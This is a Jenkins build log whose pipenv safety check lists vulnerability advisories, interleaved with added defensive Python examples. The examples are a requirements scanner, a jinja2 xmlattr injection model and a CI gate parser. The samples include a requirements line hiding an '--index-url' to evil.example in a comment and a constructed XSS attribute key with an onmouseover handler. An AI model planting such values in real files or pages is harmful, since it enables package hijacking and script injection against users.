Started by an SCM change
Running as SYSTEM
Building in workspace /var/jenkins_home/jobs/SolidBlue_III/workspace
The recommended git tool is: NONE
Warning: CredentialId "cd8fb110-f9c4-49d8-bd61-e71f44f42830" could not be found.
 > git rev-parse --resolve-git-dir /var/jenkins_home/jobs/SolidBlue_III/workspace/.git # timeout=10
Fetching changes from the remote Git repository
 > git config remote.origin.url https://tidalwave@bitbucket.org/tidalwave/solidblue3-p-src.git # timeout=10
Fetching upstream changes from https://tidalwave@bitbucket.org/tidalwave/solidblue3-p-src.git
 > git --version # timeout=10
 > git --version # 'git version 2.30.2'
 > git fetch --tags --force --progress -- https://tidalwave@bitbucket.org/tidalwave/solidblue3-p-src.git +refs/heads/*:refs/remotes/origin/* # timeout=10
 > git rev-parse refs/remotes/origin/master^{commit} # timeout=10
Checking out Revision 1a78c7d07abd366b987efa47d10e4d1206a9f709 (refs/remotes/origin/master)
 > git config core.sparsecheckout # timeout=10
 > git checkout -f 1a78c7d07abd366b987efa47d10e4d1206a9f709 # timeout=10
Commit message: "Added ignorable diagnostic."
 > git rev-list --no-walk da5dde97992ac199d988a8573ac32d989157236b # timeout=10
[workspace] $ /bin/sh -xe /tmp/jenkins5890176478860587619.sh
+ ./.jenkins-script.sh
================================ git clone asdf
fatal: destination path '/var/jenkins_home/jobs/SolidBlue_III/workspace/.asdf' already exists and is not an empty directory.
================================ asdf plugin-add python
updating plugin repository...
From https://github.com/asdf-vm/asdf-plugins
   eabdf06..00af419  master     -> origin/master
HEAD is now at 00af419 feat: adding plugin for avalanchego (#1058)
Plugin named python already added
================================ asdf install python 3.9.0
python 3.9.0 is already installed
================================ asdf local python 3.9.0
================================ pip install --user pipenv
./.jenkins-script.sh: line 22: : command not found
rm -rf build __pycache__
echo "================================ Check"
================================ Check
"/var/jenkins_home/.local/bin/pipenv" check
Checking PEP 508 requirements...
Passed!
Checking installed package safety...
68477: virtualenv <20.21.0 resolved (20.2.1 installed)!
Virtualenv version 20.21.0 addresses a race condition in `virtualenv.cli_run` where a `FileNotFoundError` could occur for a JSON file in `pypa/virtualenv/py_info/1`. This error happens if the underlying interpreter is updated, causing the JSON file to be deleted and rewritten.
73456: virtualenv <20.26.6 resolved (20.2.1 installed)!
Affected versions of the virtualenv package are vulnerable to command injection. This vulnerability could allow an attacker to execute arbitrary commands by exploiting improperly quoted string placeholders in activation scripts. The vulnerable functions include various shell activation scripts where placeholders like __VIRTUAL_ENV__ are used. The exploitability depends on the ability to control the input to these placeholders. Users are advised to update to the version where a quoting mechanism has been implemented to mitigate this risk. This vulnerability is specific to environments where shell scripts are used for virtual environment activation. The issue is tracked under CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection').
44492: pipenv >=2018.10.9,<=2021.11.23 resolved (2020.11.15 installed)!
Pipenv 2022.1.8 includes a fix for CVE-2022-21668: Starting with version 2018.10.9 and prior to version 2022.1.8, a flaw in pipenv's parsing of requirements files allows an attacker to insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems. If an attacker is able to hide a malicious '--index-url' option in a requirements file that a victim installs with pipenv, the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim's host during installation (remote code execution/RCE). When pip installs from a source distribution, any code in the setup.py is executed by the install process.
https://github.com/pypa/pipenv/security/advisories/GHSA-qc9x-gjcv-465w
52365: certifi <2022.12.07 resolved (2020.12.5 installed)!
Certifi 2022.12.07 includes a fix for CVE-2022-23491: Certifi 2022.12.07 removes root certificates from "TrustCor" from the root store. These are in the process of being removed from Mozilla's trust store. TrustCor's root certificates are being removed pursuant to an investigation prompted by media reporting that TrustCor's ownership also operated a business that produced spyware. Conclusions of Mozilla's investigation can be found in the linked google group discussion.
https://github.com/certifi/python-certifi/security/advisories/GHSA-43fp-rhv2-5gv8
https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/oxX69KFvsm4/m/yLohoVqtCgAJ
59956: certifi >=2015.04.28,<2023.07.22 resolved (2020.12.5 installed)!
Certifi 2023.07.22 includes a fix for CVE-2023-37920: Certifi prior to version 2023.07.22 recognizes "e-Tugra" root certificates. e-Tugra's root certificates were subject to an investigation prompted by reporting of security issues in their systems. Certifi 2023.07.22 removes root certificates from "e-Tugra" from the root store.
https://github.com/certifi/python-certifi/security/advisories/GHSA-xqr8-7jwr-rhp7
51499: wheel <0.38.1 resolved (0.35.1 installed)!
Wheel 0.38.1 includes a fix for CVE-2022-40898: An issue discovered in Python Packaging Authority (PyPA) Wheel 0.37.1 and earlier allows remote attackers to cause a denial of service via attacker controlled input to wheel cli.
https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages
52495: setuptools <65.5.1 resolved (50.3.2 installed)!
Setuptools 65.5.1 includes a fix for CVE-2022-40897: Python Packaging Authority (PyPA) setuptools before 65.5.1 allows remote attackers to cause a denial of service via HTML in a crafted package or custom PackageIndex page. There is a Regular Expression Denial of Service (ReDoS) in package_index.py.
72236: setuptools <70.0.0 resolved (50.3.2 installed)!
Affected versions of Setuptools allow for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system.
39611: pyyaml <5.4 resolved (5.3.1 installed)!
Pyyaml version 5.4 includes a fix for CVE-2020-14343: A vulnerability was discovered in the PyYAML library in versions before 5.4, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw.
This flaw allows an attacker to execute arbitrary code on the system by abusing the python/object/new constructor. This flaw is due to an incomplete fix for CVE-2020-1747.
https://bugzilla.redhat.com/show_bug.cgi?id=1860466
45185: pylint <2.13.0 resolved (2.6.0 installed)!
Pylint 2.13.0 fixes a crash when using the doc_params extension.
https://github.com/PyCQA/pylint/issues/5322
39621: pylint <2.7.0 resolved (2.6.0 installed)!
Pylint 2.7.0 includes a fix for vulnerable regular expressions in 'pyreverse'.
https://github.com/pylint-dev/pylint/commit/5405dd5115d598fa69e49538d50ec79202b1b52e
66067: pylint >=0,<2.6.1 resolved (2.6.0 installed)!
Pylint before 2.6.1 is susceptible to a Regular Expression Denial of Service (ReDoS) vulnerability due to issues in its pyreverse component. This issue arises from certain regular expressions in pyreverse that can be exploited by causing catastrophic backtracking, significantly slowing down the service by forcing it to take a disproportionate amount of time to process inputs. This vulnerability allows attackers to use specially crafted inputs that increase the processing time exponentially, potentially leading to a service becoming inaccessible to legitimate users.
https://github.com/pylint-dev/pylint/commit/5405dd5115d598fa69e49538d50ec79202b1b52e
40291: pip <21.1 resolved (20.2.4 installed)!
Pip 21.1 updates its dependency 'urllib3' to v1.26.4 due to security issues.
42559: pip <21.1 resolved (20.2.4 installed)!
A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity.
67599: pip <21.1 resolved (20.2.4 installed)!
An issue was discovered in Pip (all versions) because it installs the version with the highest version number, even if the user had intended to obtain a private package from a private index.
This only affects use of the --extra-index-url option, and exploitation requires that the package does not already exist in the public index (and thus the attacker can put the package there with an arbitrary version number). A warning was added about this behavior in version 21.1. NOTE: it has been reported that this is intended functionality and the user is responsible for using --extra-index-url securely.
62044: pip <23.3 resolved (20.2.4 installed)!
Affected versions of Pip are vulnerable to Command Injection. When installing a package from a Mercurial VCS URL (i.e. "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the "hg clone" call (i.e. "--config"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.
40072: lxml <4.6.3 resolved (4.6.2 installed)!
Lxml version 4.6.3 includes a fix for CVE-2021-28957: An XSS vulnerability was discovered in python-lxml's clean module versions before 4.6.3. When disabling the safe_attrs_only and forms arguments, the Cleaner class does not remove the formaction attribute, allowing JS to bypass the sanitizer. A remote attacker could exploit this flaw to run arbitrary JS code on users who interact with incorrectly sanitized HTML.
https://bugs.launchpad.net/lxml/+bug/1888153
43366: lxml <4.6.5 resolved (4.6.2 installed)!
Lxml 4.6.5 includes a fix for CVE-2021-43818: Prior to version 4.6.5, the HTML Cleaner in lxml.html lets certain crafted script content pass through, as well as script content in SVG files embedded using data URIs. Users that employ the HTML cleaner in a security relevant context should upgrade to lxml 4.6.5 to receive a patch.
50748: lxml <4.9.1 resolved (4.6.2 installed)!
Lxml 4.9.1 includes a fix for CVE-2022-2309: NULL Pointer Dereference allows attackers to cause a denial of service (or application crash).
This only applies when lxml is used together with libxml2 2.9.10 through 2.9.14. libxml2 2.9.9 and earlier are not affected. It allows triggering crashes through forged input data, given a vulnerable code sequence in the application. The vulnerability is caused by the iterwalk function (also used by the canonicalize function). Such code shouldn't be in wide-spread use, given that parsing + iterwalk would usually be replaced with the more efficient iterparse function. However, an XML converter that serialises to C14N would also be vulnerable, for example, and there are legitimate use cases for this code sequence. If untrusted input is received (also remotely) and processed via iterwalk function, a crash can be triggered.
39525: jinja2 <2.11.3 resolved (2.11.2 installed)!
This affects the package jinja2 from 0.0.0 and before 2.11.3. The ReDoS vulnerability is mainly due to the '_punctuation_re regex' operator and its use of multiple wildcards. The last wildcard is the most exploitable as it searches for trailing punctuation. This issue can be mitigated by using Markdown to format user content instead of the urlize filter, or by implementing request timeouts and limiting process memory.
64227: jinja2 <3.1.3 resolved (2.11.2 installed)!
Jinja2 before 3.1.3 is affected by a Cross-Site Scripting vulnerability. Special placeholders in the template allow writing code similar to Python syntax. It is possible to inject arbitrary HTML attributes into the rendered HTML template. The Jinja 'xmlattr' filter can be abused to inject arbitrary HTML attribute keys and values, bypassing the auto escaping mechanism and potentially leading to XSS. It may also be possible to bypass attribute validation checks if they are blacklist-based.
71591: jinja2 <3.1.4 resolved (2.11.2 installed)!
Jinja is an extensible templating engine. The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters.
XML/HTML attributes cannot contain spaces, `/`, `>`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for CVE-2024-22195 only addressed spaces but not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe.
70612: jinja2 >=0 resolved (2.11.2 installed)!
In Jinja2, the from_string function is prone to Server Side Template Injection (SSTI) where it takes the source parameter as a template object, renders it, and then returns it. The attacker can exploit it with INJECTION COMMANDS in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing.
47833: click <8.0.0 resolved (7.1.2 installed)!
Click 8.0.0 uses 'mkstemp()' instead of the deprecated & insecure 'mktemp()'.
https://github.com/pallets/click/issues/1752
make: *** [Makefile:15: check] Error 1
[MyPy] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace')
[MyPy] -> found 0 issues (skipped 0 duplicates)
[MyPy] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace')
[MyPy] -> found 0 issues (skipped 0 duplicates)
[MyPy] Successfully parsed console log
[MyPy] -> found 0 issues (skipped 0 duplicates)
[MyPy] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace')
[MyPy] Skipping post processing
[MyPy] No filter has been set, publishing all 0 issues
[MyPy] Repository miner is not configured, skipping repository mining
[MyPy] Successfully parsed console log
[MyPy] -> found 0 issues (skipped 0 duplicates)
[MyPy] Successfully parsed console log
[MyPy] -> found 0 issues (skipped 0 duplicates)
[MyPy] Successfully parsed console log
[MyPy] -> found 0 issues (skipped 0 duplicates)
[MyPy] Successfully parsed console log
[MyPy] -> found 0 issues (skipped 0 duplicates)
[MyPy] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace')
[MyPy] Skipping post processing
[MyPy] No filter has been set, publishing all 0 issues
[MyPy] Repository miner is not configured, skipping repository mining
[MyPy] Reference build recorder is not configured
[MyPy] Obtaining reference build from same job (SolidBlue III)
[MyPy] Using reference build 'SolidBlue_III #119' to compute new, fixed, and outstanding issues
[MyPy] Issues delta (vs. reference build): outstanding: 0, new: 0, fixed: 0
[MyPy] No quality gates have been set - skipping
[MyPy] Health report is disabled - skipping
[MyPy] Created analysis result for 0 issues (found 0 new issues, fixed 0 issues)
[MyPy] Attaching ResultAction with ID 'mypy' to build 'SolidBlue_III #120'.
[Checks API] No suitable checks publisher found.
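Two of the findings above concern where a requirements file makes pip resolve packages from: advisory 44492 (CVE-2022-21668, an `--index-url` smuggled into a comment that old pipenv still honoured) and advisory 67599 (`--extra-index-url` letting a public package with a higher version shadow a private one). The scanner below is an added example, not code from the SolidBlue_III project, pipenv or pip: it reads a requirements file and reports every index-changing option, distinguishing options hidden in comment text from ones declared as real lines. The sample file is constructed for the example; the host names in it and the severity labels `HIDDEN`, `CONFUSION` and `REVIEW` are assumptions of this example.

```python
"""Report index-redirecting options in a requirements file, including ones hidden in comments."""
import re
from typing import List, Tuple

# pip options that change where packages are fetched from. A legitimate file may
# declare them as their own line; one hidden after '#' is the CVE-2022-21668 pattern.
_OPTION_RE = re.compile(
    r"(?<![\w-])(--index-url|--extra-index-url|--find-links|--trusted-host|-i|-f)"
    r"(?![\w-])(?:\s*=\s*|\s+)?(\S+)?"
)

Finding = Tuple[int, str, str, str]  # (line number, "option" | "comment", option, value)


def scan_requirements(text: str) -> List[Finding]:
    """Return every index option found, with whether it sits in code or in a comment.

    The split at '#' is deliberately naive: a URL fragment in the code part would be
    reported as a comment hit, which errs on the side of flagging.
    """
    findings: List[Finding] = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        code, sep, comment = line.partition("#")
        for m in _OPTION_RE.finditer(code):
            findings.append((no, "option", m.group(1), m.group(2) or ""))
        if sep:
            for m in _OPTION_RE.finditer(comment):
                findings.append((no, "comment", m.group(1), m.group(2) or ""))
    return findings


def report(text: str) -> List[str]:
    """One line per finding, labelled by the risk the advisories above describe."""
    out: List[str] = []
    for no, where, opt, val in scan_requirements(text):
        if where == "comment":
            sev = "HIDDEN"      # option smuggled into a comment (CVE-2022-21668 pattern)
        elif opt == "--extra-index-url":
            sev = "CONFUSION"   # pip takes the highest version across indexes (advisory 67599)
        else:
            sev = "REVIEW"      # a declared index option: legitimate, but confirm the host
        out.append(f"{sev} line {no}: {opt} {val}".rstrip())
    return out


def has_hidden_index(text: str) -> bool:
    """True if any index option appears inside comment text."""
    return any(where == "comment" for _, where, _, _ in scan_requirements(text))


# Constructed sample file for this example; not the SolidBlue_III requirements.
SAMPLE = """\
# constructed sample requirements file (not from the SolidBlue_III repo)
requests==2.31.0
pyyaml>=5.4  # pinned after CVE-2020-14343
lxml==4.9.1 # --index-url https://evil.example/simple/
--extra-index-url https://pypi.internal.example/simple
"""

if __name__ == "__main__":
    for line in report(SAMPLE):
        print(line)
    raise SystemExit(1 if has_hidden_index(SAMPLE) else 0)
```

Run it against a real file with `python scan_requirements.py < requirements.txt` after swapping `SAMPLE` for `sys.stdin.read()`; a `HIDDEN` hit is a reason to fail the build outright, while `CONFUSION` hits are the place to confirm that every private package name is also claimed on the public index, since the advisory notes pip treats this behaviour as intended.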
[Pylint] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace')
[Pylint] -> found 0 issues (skipped 0 duplicates)
[Pylint] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace')
[Pylint] -> found 0 issues (skipped 0 duplicates)
[Pylint] Successfully parsed console log
[Pylint] -> found 0 issues (skipped 0 duplicates)
[Pylint] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace')
[Pylint] Skipping post processing
[Pylint] No filter has been set, publishing all 0 issues
[Pylint] Repository miner is not configured, skipping repository mining
[Pylint] Successfully parsed console log
[Pylint] -> found 0 issues (skipped 0 duplicates)
[Pylint] Successfully parsed console log
[Pylint] -> found 0 issues (skipped 0 duplicates)
[Pylint] Successfully parsed console log
[Pylint] -> found 0 issues (skipped 0 duplicates)
[Pylint] Successfully parsed console log
[Pylint] -> found 0 issues (skipped 0 duplicates)
[Pylint] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace')
[Pylint] Skipping post processing
[Pylint] No filter has been set, publishing all 0 issues
[Pylint] Repository miner is not configured, skipping repository mining
[Pylint] Reference build recorder is not configured
[Pylint] Obtaining reference build from same job (SolidBlue III)
[Pylint] Using reference build 'SolidBlue_III #119' to compute new, fixed, and outstanding issues
[Pylint] Issues delta (vs. reference build): outstanding: 0, new: 0, fixed: 0
[Pylint] No quality gates have been set - skipping
[Pylint] Health report is disabled - skipping
[Pylint] Created analysis result for 0 issues (found 0 new issues, fixed 0 issues)
[Pylint] Attaching ResultAction with ID 'pylint' to build 'SolidBlue_III #120'.
[Checks API] No suitable checks publisher found.
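The jinja2 findings 64227 and 71591 above turn on one distinction: the `xmlattr` filter escapes attribute values, so user-supplied values are safe, but a user-supplied key containing a space, `/`, `>` or `=` splits into an extra attribute, and the first fix only covered the space. The code below is an added, stand-alone model of that filter written for this page, not Jinja's own implementation: `xmlattr_unchecked` renders the way the advisory says the affected versions do, `xmlattr_checked` adds the key validation the advisory calls for. The attacker-controlled key in the sample is constructed for the example.

```python
"""Model of an xmlattr-style filter, with and without validation of attribute names."""
from html import escape
from typing import Mapping, Optional

# Characters that end an attribute name in HTML/XML and so start a new attribute.
# The advisory lists spaces, '/', '>' and '='; the first fix handled only spaces.
_FORBIDDEN_IN_KEY = frozenset(" \t\n\r\f\v/>=")


def xmlattr_unchecked(attrs: Mapping[str, Optional[str]]) -> str:
    """Render ' k="v"' pairs escaping values only; keys pass through verbatim.

    This is how the advisory describes the affected filter: a user-controlled value
    is safe, a user-controlled key is not.
    """
    return "".join(
        f' {key}="{escape(str(value), quote=True)}"'
        for key, value in attrs.items()
        if value is not None
    )


def xmlattr_checked(attrs: Mapping[str, Optional[str]]) -> str:
    """Same rendering, but refuse any key that could split into a second attribute."""
    for key in attrs:
        if not key or any(ch in _FORBIDDEN_IN_KEY for ch in key):
            raise ValueError(f"invalid attribute name: {key!r}")
    return xmlattr_unchecked(attrs)


def key_rejected(key: str) -> bool:
    """True if xmlattr_checked refuses this key (helper for exercising the check)."""
    try:
        xmlattr_checked({key: "1"})
    except ValueError:
        return True
    return False


# Constructed attacker input: no space at all, so a space-only check lets it through,
# yet '/' and '=' still break it into a second attribute with an event handler.
EVIL_KEY = "data-x/onmouseover=alert(1)//"

if __name__ == "__main__":
    print("value escaped:  <a" + xmlattr_unchecked({"title": '"><script>'}) + ">")
    print("key injected:   <a" + xmlattr_unchecked({EVIL_KEY: "1"}) + ">")
    print("key rejected:  ", key_rejected(EVIL_KEY))
```

`xmlattr_unchecked({EVIL_KEY: "1"})` yields ` data-x/onmouseover=alert(1)//="1"`, which a browser reads as a `data-x` attribute followed by an `onmouseover` handler, exactly the split the advisory warns about; the checked variant rejects it while still accepting ordinary keys such as `data-x` with any value, which is the "values remain safe" half of the advisory.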
Started calculate disk usage of build
Finished Calculation of disk usage of build in 0 seconds
Started calculate disk usage of workspace
Finished Calculation of disk usage of workspace in 0 seconds
Finished: SUCCESS
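The log above shows `pipenv check` reporting findings (several of them remote code execution, for instance advisories 44492 and 72236), `make` exiting with `Error 1` on the `check` target, and the job still ending with `Finished: SUCCESS`, so the scan never gated the build. The parser below is an added example written for this page, not part of the SolidBlue_III job or of pipenv: it turns the `Checking installed package safety...` section into structured findings and returns the exit code a CI step should use, with an `ignore_ids` allow-list (an assumed name) for findings a team has explicitly accepted, such as 70612, which the advisory text itself says the maintainer disputes. The sample text is a constructed excerpt of the console lines above.

```python
"""Parse the package-safety section of `pipenv check` output and gate a build on it."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set

# Header of each finding, e.g. "73456: virtualenv <20.26.6 resolved (20.2.1 installed)!"
_FINDING_RE = re.compile(r"^(\d+): (\S+) (\S+) resolved \((\S+) installed\)!$")
_CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class Finding:
    advisory_id: int
    package: str
    affected_spec: str
    installed: str
    description: str = ""

    @property
    def cves(self) -> List[str]:
        """CVE identifiers mentioned in the advisory text, if any."""
        return sorted(set(_CVE_RE.findall(self.description)))


def parse_check_output(text: str) -> List[Finding]:
    """Collect findings; free text after a header line is that finding's description."""
    findings: List[Finding] = []
    current: Optional[Finding] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = _FINDING_RE.match(line)
        if m:
            current = Finding(int(m.group(1)), m.group(2), m.group(3), m.group(4))
            findings.append(current)
        elif current is not None and line and not line.startswith("make:"):
            current.description = (current.description + " " + line).strip()
    return findings


def packages_to_upgrade(findings: Iterable[Finding]) -> Dict[str, Set[str]]:
    """Package -> affected version specs, i.e. the constraints an upgrade must escape."""
    out: Dict[str, Set[str]] = {}
    for f in findings:
        out.setdefault(f.package, set()).add(f.affected_spec)
    return out


def gate(findings: Iterable[Finding], ignore_ids: Iterable[int] = ()) -> int:
    """Exit code for the CI step: 0 only when every finding is on the accepted list."""
    ignored = set(ignore_ids)
    blocking = [f for f in findings if f.advisory_id not in ignored]
    return 1 if blocking else 0


# Constructed excerpt of the console output above (descriptions shortened).
CHECK_LOG = """\
Checking PEP 508 requirements...
Passed!
Checking installed package safety...
73456: virtualenv <20.26.6 resolved (20.2.1 installed)!
Affected versions of the virtualenv package are vulnerable to command injection.
44492: pipenv >=2018.10.9,<=2021.11.23 resolved (2020.11.15 installed)!
Pipenv 2022.1.8 includes a fix for CVE-2022-21668: a flaw in pipenv's parsing of requirements files.
https://github.com/pypa/pipenv/security/advisories/GHSA-qc9x-gjcv-465w
72236: setuptools <70.0.0 resolved (50.3.2 installed)!
Affected versions of Setuptools allow for remote code execution via its download functions.
70612: jinja2 >=0 resolved (2.11.2 installed)!
In Jinja2, the from_string function is prone to Server Side Template Injection (SSTI).
NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid.
make: *** [Makefile:15: check] Error 1
"""

if __name__ == "__main__":
    found = parse_check_output(CHECK_LOG)
    for f in found:
        print(f"{f.advisory_id} {f.package} {f.installed} affected by {f.affected_spec} {f.cves}")
    print("upgrade:", packages_to_upgrade(found))
    raise SystemExit(gate(found, ignore_ids={70612}))
```

Wired into the job as `pipenv check | tee check.log; python gate_check.py < check.log` (after replacing `CHECK_LOG` with `sys.stdin.read()`), the step's non-zero exit is what the `-e` in `/bin/sh -xe` needs in order to stop the build, instead of the `make` error being swallowed inside `.jenkins-script.sh` as it is above.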